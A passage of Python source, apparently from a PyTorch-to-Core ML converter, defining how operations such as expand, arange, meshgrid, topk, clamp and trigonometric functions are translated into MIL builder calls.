node.\n chunks = node.attr[\"chunks\"]\n dim = node.attr[\"dim\"]\n\n total = x.shape[dim]\n size = int(_math.ceil(float(total) / float(chunks)))\n split_sizes = [size] * int(_math.floor(total / size))\n remainder = total - sum(split_sizes)\n if remainder > 0:\n split_sizes.append(remainder)\n\n res = mb.split(x=x, split_sizes=split_sizes, axis=dim, name=node.name)\n for val, name in zip(res, node.outputs):\n context.add(val, name)\n\n\ndef _broadcast(name, tensor, shape):\n if len(shape) > tensor.rank:\n new_dims = len(shape) - tensor.rank\n tensor = mb.expand_dims(x=tensor, axes=list(range(new_dims)))\n\n reps = []\n for ts, ds in zip(tensor.shape, shape):\n if not is_symbolic(ts) and not is_symbolic(ds) and ds > 0 and ts == 1:\n reps.append(ds)\n else:\n reps.append(1)\n\n res = mb.tile(x=tensor, reps=reps, name=name)\n return res\n\n\n@register_torch_op(torch_alias=[\"expand_copy\"])\ndef expand(context, node):\n def _broadcast_dynamic(name, tensor, shape):\n # Add any extra dimensions\n if len(shape) > tensor.rank:\n new_dims = len(shape) - tensor.rank\n tensor = mb.expand_dims(x=tensor, axes=list(range(new_dims)))\n\n tensor_shape = mb.shape(x=tensor)\n shape = mb.concat(values=shape, axis=0)\n reps = mb.real_div(x=shape, y=tensor_shape)\n reps = mb.cast(x=reps, dtype=\"int32\")\n res = mb.tile(x=tensor, reps=reps, name=name)\n return res\n\n\n # PyTorch 1.6+ has 3 inputs while older version has 2\n inputs = _get_inputs(context, node, expected=[2, 3])\n\n x = inputs[0]\n shape = inputs[1]\n\n if isinstance(shape, list):\n res = _broadcast_dynamic(node.name, x, shape)\n else:\n res = _broadcast(node.name, x, shape.val)\n context.add(res)\n\n\n@register_torch_op\ndef expand_as(context, node):\n # PyTorch 1.6+ has 3 inputs while older version has 2\n inputs = _get_inputs(context, node, expected=[2, 3])\n x = inputs[0]\n other = inputs[1]\n\n res = _broadcast(node.name, x, other.shape)\n context.add(res)\n\n\n@register_torch_op\ndef arange(context, node):\n inputs = _get_inputs(context, node)\n # dtype = inputs[-4]\n # layout = inputs[-3]\n # device = inputs[-2]\n # pin_memory = inputs[-1]\n if len(inputs) == 5:\n # inputs are [end, dtype, layout, device, pin_memory]\n start = 0\n end = inputs[0]\n step = 1\n elif len(inputs) == 6:\n # inputs are [start, end, dtype, layout, device, pin_memory]\n start = inputs[0]\n end = inputs[1]\n step = 1\n elif len(inputs) == 7:\n # inputs are [start, end, step, dtype, layout, device, pin_memory]\n start = inputs[0]\n end = inputs[1]\n step = inputs[2]\n else:\n raise ValueError(\n \"arange must have exactly 5, 6, or 7 inputs, got {}\".format(len(inputs))\n )\n # If start, end, and step don't have the same dtype, we cast them to fp32\n int_start = isinstance(start, int) or types.is_int(start.dtype)\n int_end = isinstance(end, int) or types.is_int(end.dtype)\n int_step = isinstance(step, int) or types.is_int(step.dtype)\n\n if int_start != int_end or int_start != int_step:\n start = mb.cast(x=start, dtype=\"fp32\")\n end = mb.cast(x=end, dtype=\"fp32\")\n step = mb.cast(x=step, dtype=\"fp32\")\n res = mb.range_1d(start=start, end=end, step=step, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef masked_fill(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n mask = inputs[1]\n value = inputs[2]\n\n if not types.is_bool(mask.dtype):\n # cond must be bool type\n mask = mb.cast(x=mask, dtype=\"bool\")\n\n if value.dtype != x.dtype:\n value = mb.cast(x=value, dtype=builtin_to_string(x.dtype))\n\n value, x = promote_input_dtypes([value, x])\n res = mb.select(cond=mask, a=value, b=x, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef meshgrid(context, node):\n \"\"\"\n For N input tensors, a meshgrid is constructed by viewing each tensor as an N-dimension tensor\n with values in the dimension corresponding it its order in the args. (a.)\n Then, it is expanded along dimensions corresponding to the dimensions of each\n 1d tensor in the order that they were passed in. (b.)\n\n Each output tensor is put into a tuple that is returned. These tuples form\n N, N-dimenional grids, where the ith grid is defined as expanding the ith input over\n dimensions defined by the other inputs.\n \"\"\"\n supported_indexing_modes = (\"ij\", \"xy\")\n indexing = \"ij\"\n inputs = _get_inputs(context, node, expected=[1, 2])\n\n if len(inputs) == 2:\n indexing = inputs[1].val\n if indexing not in supported_indexing_modes:\n raise ValueError(\"indexing mode {} not supported\".format(indexing))\n\n tensor_inputs = inputs[0]\n assert isinstance(tensor_inputs, (list, tuple))\n if len(tensor_inputs) < 2:\n raise ValueError(\"Requires >= 2 tensor inputs.\")\n\n if any([len(tensor_var.shape) > 1 for tensor_var in tensor_inputs]):\n raise ValueError(\"meshgrid received non-1d tensor.\")\n\n dim_tuple = tuple(tensor_var.shape[0] for tensor_var in tensor_inputs)\n\n grids = []\n size = len(tensor_inputs)\n for i in range(size):\n view_shape = [1] * size\n view_shape[i] = -1\n view_shape = tuple(view_shape)\n # (a.) in docstring\n view = mb.reshape(\n x=tensor_inputs[i], shape=view_shape, name=node.name + \"_view_\" + str(i)\n )\n\n # (b.) in docstring\n reps = [\n ds if ds > 0 and ts == 1 else 1 for ts, ds in zip(view.shape, dim_tuple)\n ]\n res = mb.tile(x=view, reps=reps, name=node.name + \"_expand_\" + str(i))\n\n # transpose the first two dimensions for \"xy\" indexing\n if indexing == \"xy\":\n perm = [1, 0] + list(range(2, size))\n res = mb.transpose(x=res, perm=perm, name=node.name + \"_transpose_\" + str(i))\n\n grids.append(res)\n\n context.add(tuple(grids), node.name)\n\n\n# Defines all the nodes that are noOps\n@register_torch_op(\n torch_alias=[\n \"clone\",\n \"contiguous\",\n \"detach\",\n \"device\",\n \"dropout\",\n \"feature_dropout\",\n \"lift_fresh\",\n ]\n)\ndef noop(context, node):\n logger.info(\"Setting pytorch op: {} to no-op.\".format(node))\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n context.add(_input, torch_name=node.name)\n\n\n@register_torch_op\ndef argmax(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n axis = inputs[1]\n keep_dims = inputs[2]\n if types.is_int(x.dtype) and x.dtype._width == 64:\n # MIL reduce_argmax doesn't support int64.\n x = mb.cast(x=x, dtype=\"int32\")\n res = mb.reduce_argmax(x=x, axis=axis, keep_dims=keep_dims, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"empty_like\"])\ndef zeros_like(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n shape = mb.shape(x=x)\n if inputs[1] and inputs[1].val:\n dtype = inputs[1].val\n np_type = NUM_TO_NUMPY_DTYPE[dtype]\n else:\n np_type = nptype_from_builtin(x.dtype)\n\n if shape.can_be_folded_to_const():\n shape = shape.val\n zeros = _np.zeros(shape).astype(np_type)\n zeros_like = mb.const(val=zeros, name=node.name)\n else:\n value = np_type(0)\n if is_current_opset_version_compatible_with(target.iOS16):\n zeros_like = mb.fill_like(ref_tensor=x, value=value, name=node.name)\n else:\n zeros_like = mb.fill(shape=shape, value=value, name=node.name)\n\n context.add(zeros_like)\n\n\n@register_torch_op(torch_alias=[\"empty\"])\ndef zeros(context, node):\n inputs = _get_inputs(context, node)\n size = inputs[0]\n if inputs[1] is not None:\n dtype = inputs[1].val\n else:\n dtype = torch.get_default_dtype()\n assert dtype in (torch.float32, torch.float64)\n dtype = 6\n\n if isinstance(size, list) or not size.can_be_folded_to_const():\n # the size is dynamic or this zeros op cannot be folded into const.\n size = mb.concat(values=size, axis=0) if isinstance(size, list) else size\n np_type = NUM_TO_NUMPY_DTYPE[dtype]\n zeros = mb.fill(shape=size, value=np_type(0), name=node.name)\n else:\n # the size is static and this zeros op can be folded into const.\n size = size.val\n # layout = inputs[2] unused\n # device = inputs[3] unused\n # pin_memory = inputs[4] unused\n torch_dtype = NUM_TO_TORCH_DTYPE[dtype]\n zeros_array = torch.zeros(tuple(size)).type(torch_dtype).numpy()\n zeros = mb.const(val=zeros_array, name=node.name)\n\n context.add(zeros)\n\n\n@register_torch_op(torch_alias=[\"new_empty\"])\ndef new_zeros(context, node):\n inputs = _get_inputs(context, node)\n shape = inputs[1]\n if isinstance(shape, list):\n # when the size is dynamic, it is a list of pymil scalar,\n # we need to concat them first to get a shape.\n shape = mb.concat(values=shape, axis=0)\n context.add(mb.fill(shape=shape, value=0., name=node.name))\n\n\n@register_torch_op\ndef dim(context, node):\n inputs = _get_inputs(context, node)\n shape = mb.shape(x=inputs[0])\n rank = mb.shape(x=shape)\n context.add(value_at(rank, 0, node.name))\n\n\n@register_torch_op\ndef min(context, node):\n inputs = _get_inputs(context, node, expected=[1, 2, 3])\n\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.min.html\n if len(inputs) == 1:\n value = mb.reduce_min(x=inputs[0], axes=None, name=node.name)\n context.add(value)\n elif len(inputs) == 2:\n value = mb.minimum(x=inputs[0], y=inputs[1], name=node.name)\n context.add(value)\n elif len(inputs) == 3:\n _input = inputs[0]\n dim = inputs[1].val\n keepdim = inputs[2].val\n\n values = mb.reduce_min(x=_input, axes=[dim], keep_dims=keepdim)\n indices = mb.reduce_argmin(x=_input, axis=dim, keep_dims=keepdim)\n assert len(node.outputs) == 2\n values_name = node.outputs[0]\n indices_name = node.outputs[1]\n context.add(values, torch_name=values_name)\n context.add(indices, torch_name=indices_name)\n\n\n@register_torch_op\ndef max(context, node):\n inputs = _get_inputs(context, node, expected=[1, 2, 3])\n\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.max.html\n if len(inputs) == 1:\n value = mb.reduce_max(x=inputs[0], axes=None, name=node.name)\n context.add(value)\n elif len(inputs) == 2:\n value = mb.maximum(x=inputs[0], y=inputs[1], name=node.name)\n context.add(value)\n elif len(inputs) == 3:\n _input = inputs[0]\n dim = inputs[1].val\n keepdim = inputs[2].val\n\n values = mb.reduce_max(x=_input, axes=[dim], keep_dims=keepdim)\n indices = mb.reduce_argmax(x=_input, axis=dim, keep_dims=keepdim)\n assert len(node.outputs) == 2\n values_name = node.outputs[0]\n indices_name = node.outputs[1]\n context.add(values, torch_name=values_name)\n context.add(indices, torch_name=indices_name)\n\ndef _add_amax_amin(context, node, reduce_op):\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.amax.html\n # mimic functionality from https://pytorch.org/docs/stable/generated/torch.amin.html\n assert len(node.outputs) == 1\n\n all_inputs = _get_inputs(context, node, expected=[2, 3])\n _input = all_inputs[0]\n dim = [all_inputs[1].val] if type(all_inputs[1].val) == int else [x for x in all_inputs[1].val]\n keepdim = all_inputs[2] if len(all_inputs) == 3 else False\n\n context.add(reduce_op(x=_input, axes=dim, keep_dims=keepdim), torch_name=node.outputs[0])\n\n@register_torch_op\ndef amax(context, node):\n _add_amax_amin(context, node, mb.reduce_max)\n\n@register_torch_op\ndef amin(context, node):\n _add_amax_amin(context, node, mb.reduce_min)\n\n\n@register_torch_op\ndef argsort(context, node):\n inputs = _get_inputs(context, node, expected=3)\n ascending = mb.logical_not(x=inputs[2])\n argsort = mb.argsort(x=inputs[0], axis=inputs[1], ascending=ascending, name=node.name)\n context.add(argsort)\n\n\n@register_torch_op\ndef sort(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n axis = inputs[1].val\n ascending = not inputs[2].val\n indices_name = node.outputs[1]\n values_name = node.outputs[0]\n indices = mb.argsort(x=_input, axis=axis, ascending=ascending, name=indices_name)\n values = mb.gather_along_axis(x=_input, indices=indices, axis=axis, name=values_name)\n context.add(values, torch_name=values_name)\n context.add(indices, torch_name=indices_name)\n\n\n@register_torch_op\ndef append(context, node):\n # Note: by applying torchir_passes.transform_inplace_ops the meaning of\n # this op is changed from the original TorchIR. This op expects a python\n # list or MIL List as its first input. If an MIL List, the second input\n # must be a tensor of whatever shape the List expects. If not an MIL List,\n # the second input can by anything. The result will be the second input\n # joined to the first input, either by list_write if an MIL list, or\n # append if a python list.\n inputs = _get_inputs(context, node, expected=2)\n ls = inputs[0]\n value = inputs[1]\n\n if isinstance(ls, list):\n context.add(ls + [value], node.name)\n elif isinstance(ls, ListVar):\n index = mb.list_length(ls=ls, name=node.name + \"_index\")\n res = mb.list_write(ls=ls, index=index, value=value, name=node.name)\n context.add(res)\n else:\n raise ValueError(\n \"can only append to Python list or MIL ListVar, got {}.\".format(\n type(inputs[0])\n )\n )\n\n\n@register_torch_op\ndef gather(context, node):\n inputs = _get_inputs(context, node)\n res = mb.gather_along_axis(x=inputs[0], indices=inputs[2], axis=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef index_select(context, node):\n x = context[node.inputs[0]]\n axis = context[node.inputs[1]]\n indices = context[node.inputs[2]]\n context.add(mb.gather(x=x, indices=indices, axis=axis, name=node.name))\n\n\n@register_torch_op(torch_alias=[\"abs\"])\ndef _abs(context, node):\n x = _get_inputs(context, node, expected=1)[0]\n if types.is_complex(x.dtype):\n context.add(mb.complex_abs(x=x, name=node.name))\n else:\n context.add(mb.abs(x=x, name=node.name))\n\n\n@register_torch_op\ndef repeat(context, node):\n x = context[node.inputs[0]]\n reps = context[node.inputs[1]]\n if isinstance(reps, list):\n reps = mb.concat(values=reps, axis=0)\n\n if reps.shape[0] > len(x.shape):\n x = mb.expand_dims(x=x, axes=list(range(reps.shape[0] - x.rank)))\n context.add(mb.tile(x=x, reps=reps, name=node.name))\n\n\n@register_torch_op\ndef repeat_interleave(context, node):\n \"\"\"\n For now, we only support scalar repeats + None or 0 dim\n \"\"\"\n x, repeats, dim, _ = _get_inputs(context, node, expected=4)\n\n repeats_val = repeats.val\n if isinstance(repeats_val, np.ndarray):\n repeats_val0 = np.expand_dims(repeats_val, 0).reshape(-1)[0]\n if np.any(repeats_val != repeats_val0):\n raise NotImplementedError(\n \"Conversion for torch.repeat_interleave with Tensor repeats has not been implemented\"\n )\n repeats_val = repeats_val0\n\n # This would operate on the flattened input tensor\n if dim is None:\n x = mb.reshape(x=x, shape=(-1,))\n else:\n if dim.val != 0:\n raise NotImplementedError(\n \"Conversion for torch.repeat_interleave with non-zero dim has not been implemented\"\n )\n\n \"\"\"\n on a high level:\n x\n | tile in dim 0\n v\n [x, x, ...]\n | reshape to split the repeats\n v\n [[x],\n [x],\n ...]\n | transpose(1, 0)\n V\n [x^T, x^T, ...]\n | flatten\n V\n result\n \"\"\"\n\n reps = [1] * x.rank\n reps[0] = repeats_val\n x_tiled = mb.tile(x=x, reps=reps)\n\n split_reps = [repeats_val] + list(x.shape)\n x_reshaped = mb.reshape(x=x_tiled, shape=list(split_reps))\n\n perm = [*range(x.rank + 1)]\n perm[0] = 1\n perm[1] = 0\n x_transposed = mb.transpose(x=x_reshaped, perm=perm)\n\n result_shape = list(x.shape)\n result_shape[0] = -1\n result = mb.reshape(x=x_transposed, shape=result_shape, name=node.name)\n\n context.add(result)\n\n\n@register_torch_op\ndef acos(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.acos(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef acosh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.acosh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef asin(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.asin(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef atan(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.atan(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef atan2(context, node):\n \"\"\"\n atan2(Tensor y, Tensor x)\n Element-wise arctangent of y / x with consideration of the quadrant\n Returns a new tensor with the signed angles in radians between vector (x, y) and vector (1, 0)\n\n On a high level:\n 1. atan(y / x) to get the angle in [-pi / 2, pi / 2]\n 2. analyze quadrant to determine the angle in [-pi, pi]\n\n Reference PyTorch code https://gist.github.com/nikola-j/b5bb6b141b8d9920318677e1bba70466\n def my_atan2(y, x):\n pi = torch.from_numpy(np.array([np.pi])).to(y.device, y.dtype)\n ans = torch.atan(y / x)\n ans += ((y > 0) & (x < 0)) * pi\n ans -= ((y < 0) & (x < 0)) * pi\n ans *= (1 - ((y > 0) & (x == 0)) * 1.0)\n ans += ((y > 0) & (x == 0)) * (pi / 2)\n ans *= (1 - ((y < 0) & (x == 0)) * 1.0)\n ans += ((y < 0) & (x == 0)) * (-pi / 2)\n return ans\n \"\"\"\n inputs = _get_inputs(context, node, expected=2)\n y = inputs[0]\n x = inputs[1]\n if not types.is_float(y.dtype):\n y = mb.cast(x=y, dtype=\"fp32\")\n if not types.is_float(x.dtype):\n x = mb.cast(x=x, dtype=\"fp32\")\n\n # basic logical expressions\n y_less_0 = mb.less(x=y, y=0.0)\n y_greater_0 = mb.greater(x=y, y=0.0)\n x_less_0 = mb.less(x=x, y=0.0)\n x_equal_0 = mb.equal(x=x, y=0.0)\n\n # combined logical expressions\n ygreater0_and_xless0 = mb.logical_and(x=y_greater_0, y=x_less_0)\n yless0_and_xless0 = mb.logical_and(x=y_less_0, y=x_less_0)\n ygreater0_and_xequal0 = mb.logical_and(x=y_greater_0, y=x_equal_0)\n yless0_and_xequal0 = mb.logical_and(x=y_less_0, y=x_equal_0)\n\n # bool -> fp32 for numeric operation\n ygreater0_and_xless0_numeric = mb.cast(x=ygreater0_and_xless0, dtype=\"fp32\")\n yless0_and_xless0_numeric = mb.cast(x=yless0_and_xless0, dtype=\"fp32\")\n ygreater0_and_xequal0_numeric = mb.cast(x=ygreater0_and_xequal0, dtype=\"fp32\")\n yless0_and_xequal0_numeric = mb.cast(x=yless0_and_xequal0, dtype=\"fp32\")\n\n # quadrant modification coefficients\n coeff1 = mb.mul(x=ygreater0_and_xless0_numeric, y=_np.pi)\n coeff2 = mb.mul(x=yless0_and_xless0_numeric, y=_np.pi)\n coeff3 = mb.sub(x=1.0, y=ygreater0_and_xequal0_numeric)\n coeff4 = mb.mul(x=ygreater0_and_xequal0_numeric, y=_np.pi / 2.0)\n coeff5 = mb.sub(x=1.0, y=yless0_and_xequal0_numeric)\n coeff6 = mb.mul(x=yless0_and_xequal0_numeric, y=-_np.pi / 2.0)\n\n # if -1e-8 < x < 1e-8, x += 2e-8 to avoid y / 0\n # this shift makes atan2(0, 0) = 0, which is consistent with PyTorch torch.atan2\n x0left = mb.greater(x=x, y=-1e-8)\n x0right = mb.less(x=x, y=1e-8)\n x0 = mb.logical_and(x=x0left, y=x0right)\n x0numeric = mb.cast(x=x0, dtype=\"fp32\")\n safe_shift = mb.mul(x=x0numeric, y=2e-8)\n x_safe = mb.add(x=x, y=safe_shift)\n\n # compute atan(y / x)\n ydx = mb.real_div(x=y, y=x_safe)\n atan2_1 = mb.atan(x=ydx)\n\n # analyze quadrant\n atan2_2 = mb.add(x=atan2_1, y=coeff1)\n atan2_3 = mb.sub(x=atan2_2, y=coeff2)\n atan2_4 = mb.mul(x=atan2_3, y=coeff3)\n atan2_5 = mb.add(x=atan2_4, y=coeff4)\n atan2_6 = mb.mul(x=atan2_5, y=coeff5)\n context.add(mb.add(x=atan2_6, y=coeff6, name=node.name))\n\n\n@register_torch_op\ndef atanh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.atanh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef ceil(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.ceil(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef clamp(context, node):\n inputs = _get_inputs(context, node, expected=[1,2,3])\n x = inputs[0]\n min_val = inputs[1] if (len(inputs) > 1 and inputs[1]) else mb.const(val=_np.finfo(_np.float32).min)\n max_val = inputs[2] if (len(inputs) > 2 and inputs[2]) else mb.const(val=_np.finfo(_np.float32).max)\n\n if isinstance(min_val, Var) and isinstance(max_val, Var) and min_val.val >= max_val.val:\n # When min >= max, PyTorch sets all values to max.\n context.add(mb.fill(shape=mb.shape(x=x), value=max_val.val, name=node.name))\n return\n\n is_input_int = types.is_int(x.dtype)\n if not types.is_float(x.dtype):\n # The `mb.clip` op requires parameters from type domain ['fp16', 'fp32'].\n x = mb.cast(x=x, dtype=\"fp32\")\n x, min_val, max_val = promote_input_dtypes([x, min_val, max_val])\n if is_input_int:\n clip_res = mb.clip(x=x, alpha=min_val, beta=max_val)\n context.add(mb.cast(x=clip_res, dtype=\"int32\", name=node.name))\n else:\n context.add(mb.clip(x=x, alpha=min_val, beta=max_val, name=node.name))\n\n\n@register_torch_op\ndef triu(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n diagonal = inputs[1]\n diagonal = 0 if diagonal is None else diagonal.val\n if diagonal <= 0:\n res = mb.band_part(x=x, lower=-diagonal, upper=-1, name=node.name)\n else:\n y = mb.band_part(x=x, lower=-1, upper=diagonal - 1)\n res = mb.sub(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef tril(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n diagonal = inputs[1]\n diagonal = 0 if diagonal is None else diagonal.val\n if diagonal >= 0:\n res = mb.band_part(x=x, lower=-1, upper=diagonal, name=node.name)\n else:\n y = mb.band_part(x=x, lower=-diagonal - 1, upper=-1)\n res = mb.sub(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef cos(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.cos(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef cosh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.cosh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef exp(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.exp(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef exp2(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.exp2(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef floor(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.floor(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef reciprocal(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.inverse(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef log(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n if types.is_int(x.dtype):\n x = mb.cast(x=x, dtype=\"fp32\")\n context.add(mb.log(x=x, name=node.name))\n\n\n@register_torch_op(torch_alias=[\"round\"])\ndef _round(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.round(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef rsqrt(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.rsqrt(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef sin(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sin(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef sinh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sinh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef asinh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.asinh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef sqrt(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sqrt(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef square(context, node):\n inputs = _get_inputs(context, node, expected=1)\n # mb.square is not supported in some backend\n context.add(mb.mul(x=inputs[0], y=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef tan(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.tan(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef tanh(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.tanh(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef threshold(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n alpha = inputs[1]\n threshold_val = inputs[2]\n\n # Simple case (threshold_val == alpha)\n if alpha.val == threshold_val.val:\n threshold_node = mb.threshold(x=x, alpha=alpha, name=node.name)\n context.add(threshold_node)\n return\n\n # Complex case (threshold_val != threshold)\n threshold_node = mb.threshold(x=x, alpha=alpha, name=node.name + '_threshold')\n context.add(threshold_node)\n\n gt_node = mb.greater_equal(x=alpha, y=x, name=node.name + '_ge')\n context.add(gt_node)\n gt_node_32 = mb.cast(x=gt_node, dtype=\"fp32\", name=node.name + '_ge32')\n\n mul_node = mb.linear_activation(\n x=gt_node_32,\n alpha=float(threshold_val.val - alpha.val),\n beta=0.,\n name=node.name + '_mul'\n )\n context.add(mul_node)\n\n final_node = mb.add(x=mul_node, y=threshold_node, name=node.name)\n context.add(final_node)\n\n\n@register_torch_op\ndef sign(context, node):\n inputs = _get_inputs(context, node, expected=1)\n context.add(mb.sign(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef is_floating_point(context, node):\n inputs = _get_inputs(context, node, expected=1)\n is_float = types.is_float(inputs[0].dtype)\n context.add(mb.const(val=is_float, name=node.name))\n\n\n@register_torch_op\ndef logical_and(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = inputs\n x = mb.cast(x=x, dtype=\"bool\")\n y = mb.cast(x=y, dtype=\"bool\")\n context.add(mb.logical_and(x=x, y=y, name=node.name))\n\n@register_torch_op\ndef logical_or(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = inputs\n x = mb.cast(x=x, dtype=\"bool\")\n y = mb.cast(x=y, dtype=\"bool\")\n context.add(mb.logical_or(x=x, y=y, name=node.name))\n\n\n@register_torch_op\ndef logical_xor(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = inputs\n x = mb.cast(x=x, dtype=\"bool\")\n y = mb.cast(x=y, dtype=\"bool\")\n context.add(mb.logical_xor(x=x, y=y, name=node.name))\n\n\ndef _nonzero_as_tuple(context, node, x):\n '''\n Calculates the non-zero elements of x then slices results by each inner index.\n '''\n non_zero = mb.non_zero(x=x)\n\n result = []\n for i in range(x.rank):\n result.append(\n mb.slice_by_index(\n x=non_zero,\n begin=[0, i],\n end=[-1, -1], # Ignored, but required\n end_mask=[True, False],\n squeeze_mask=[False, True]\n )\n )\n\n context.add(result, node.name)\n\n\n@register_torch_op\ndef where(context, node):\n inputs = _get_inputs(context, node)\n\n if len(inputs) == 1:\n _nonzero_as_tuple(context, node, inputs[0])\n return\n\n assert len(inputs) == 3\n cond = inputs[0]\n if not types.is_bool(cond.dtype):\n # cond must be bool type\n cond = mb.cast(x=cond, dtype=\"bool\")\n if not any([any_symbolic(x.shape) for x in inputs[:3]]):\n # broadcast all tensors to the same shape\n broadcast_inputs = _broadcast_tensors([cond, inputs[1], inputs[2]])\n result = mb.select(\n cond=broadcast_inputs[0],\n a=broadcast_inputs[1],\n b=broadcast_inputs[2],\n name=node.name,\n )\n else:\n result = mb.select(cond=cond, a=inputs[1], b=inputs[2], name=node.name)\n context.add(result)\n\n\n@register_torch_op\ndef nonzero_numpy(context, node):\n inputs = _get_inputs(context, node, expected=1)\n _nonzero_as_tuple(context, node, inputs[0])\n\n\n@register_torch_op\ndef neg(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x, y = promote_input_dtypes([inputs[0], -1])\n context.add(mb.mul(x=x, y=y, name=node.name))\n\n@register_torch_op\ndef topk(context, node):\n def dynamic_topk(x, k, axis, ascending):\n assert k.val is None, \"Please use mb.topk directly if k is compile time known\"\n indices = mb.argsort(x=x, axis=axis, ascending=ascending)\n values = mb.gather_along_axis(x=x, indices=indices, axis=axis)\n\n k_indices = mb.range_1d(end=k, start=0, step=1)\n values = mb.gather(x=values, indices=k_indices, axis=axis)\n indices = mb.gather(x=indices, indices=k_indices, axis=axis)\n\n return values, indices\n\n inputs = _get_inputs(context, node)\n kwargs = {\"name\": node.name, \"x\": inputs[0], \"k\": inputs[1]}\n\n if len(inputs) > 6:\n raise Exception(\"Number of inputs to topk exceeds 6\")\n # optional: @axis\n if len(inputs) > 2:\n if inputs[2] is not None:\n kwargs[\"axis\"] = inputs[2].val\n\n # optional: @ascending\n if len(inputs) > 3:\n largest = inputs[3].val\n kwargs[\"ascending\"] = not largest\n\n # last inputs to topk are optional - sorted and out.\n sort = True\n if len(inputs) > 4:\n if inputs[4].val is False and not is_current_opset_version_compatible_with(target.iOS16):\n raise Exception(\"For opset <= iOS16, only sorted=True supported for the topk\")\n sort = inputs[4].val\n\n if len(inputs) > 5:\n if inputs[5] is not None:\n raise Exception(\n \"Unsupported value for argument 'out' in topk. Supported values: None, but input \"\n \"is {}\".format(inputs[5].val)\n )\n\n if is_current_opset_version_compatible_with(target.iOS16):\n kwargs[\"sort\"] = sort\n\n if kwargs[\"k\"].val is None:\n res = dynamic_topk(\n x=kwargs[\"x\"],\n k=kwargs[\"k\"],\n axis=kwargs[\"axis\"],\n ascending=kwargs[\"ascending\"]\n )\n else:\n res = mb.topk(**kwargs)\n\n values_name = node.outputs[0]\n indices_name = node.outputs[1]\n context.add(res[0], torch_name=values_name)\n context.add(res[1], torch_name=indices_name)\n\n\ndef _std(x, axes, keep_dim, unbiased, eps):\n need_rescale = False\n if unbiased:\n # If \"unbiased\" is True,\n # then we need to divide by \"N-1\" (instead of \"N\") to compute the mean of (x-E[x])^2\n # for an unbiased estimate of the variance / standard deviation.\n # In the sequence of MIL ops added below, we first compute the mean using \"N\", and only if its unbiased\n # we rescale later, the final result.\n # We ignore the \"unbiased\" flag, if any of the dimensions involved in this operation are dynamic\n # (we could have still handled that case by using \"get_shape\" etc ops, but we don't do that here,\n # trading performance for numerical accuracy)\n if axes is None:\n if not any_symbolic(x.shape) and _np.prod(x.shape) > 1:\n N = _np.prod(x.shape)\n need_rescale = True\n else:\n dims = []\n # collect dimensions corresponding to \"axes\"\n for axis in axes:\n dims.append(x.shape[axis])\n if all([not is_symbolic(s) for s in dims]):\n N = _np.prod(dims)\n if N > 1:\n need_rescale = True\n if need_rescale:\n rescale_factor 